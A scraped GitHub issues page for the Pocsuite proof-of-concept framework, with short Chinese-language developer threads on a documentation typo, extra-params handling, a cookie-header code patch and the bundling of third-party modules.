希望尽快出个安全靠谱的解析方案。。。
https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md
”为了防止误报产生以及避免被关键词被WAF等作为检测特征,要求验证结果判断的时候输出随机的字符串(可以调用API中的randoStr方法)“中的“randoStr”应为“randomStr”。
我编写POC时遇到一个问题, 假设一个脚本是用来检测admin_index.php文件是否存在的, 这个文件默认在admin目录下, 但如果用户更改了默认目录名的话, 脚本也需要相应的改变以确保正确执行, 而我不希望每次检测时都要手动去修改poc, 而是才用extra-params的方式覆盖变量默认值, 所以我在脚本内使用了:
self.params["variable"]的方式来获取用户传入, 并加了判断如果该值不存在就覆盖一个默认值过去
但是遇到了一个问题: 当用户没有传入该值时, 该poc不会执行
不知道是哪里的问题
uname -a
result hereoptions.py
def _setHTTPCookies():
"""
Set the HTTP Cookie header
"""
if conf.cookie:
debugMsg = "setting the HTTP Cookie header"
logger.debug(debugMsg)
conf.httpHeaders[HTTP_HEADER.COOKIE] = conf.cookie
修改为
def _setHTTPCookies():
"""
Set the HTTP Cookie header
"""
if conf.cookie:
debugMsg = "setting the HTTP Cookie header"
logger.debug(debugMsg)
conf.httpHeaders[HTTP_HEADER.COOKIE] = conf.cookie
else:
conf.httpHeaders[HTTP_HEADER.COOKIE] = None
不然写poc self.header['Cookie'] 必须要用上
try...except...
Is it necessary to put third-party modules in the thirdparty direcroty?
Benefit:
Disadvantage:
讨论下关于第三方模块引用的问题
是否有必要编译封装第三方模块在「thirdparty」目录
好处:
坏处:
看起来似乎是否可以维护两个分支?
一个是当前代码版本,能提供基本的调用功能即可,主要面向于新手,一些不会安装的用户。
一个新版本,采用协程提高性能,通过Makefile 等方式让使用者以安装的形式安装Pocsuite及依赖的模块,这个版本为以后主要开发版本
如题,比如:revision.py, convert.py
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.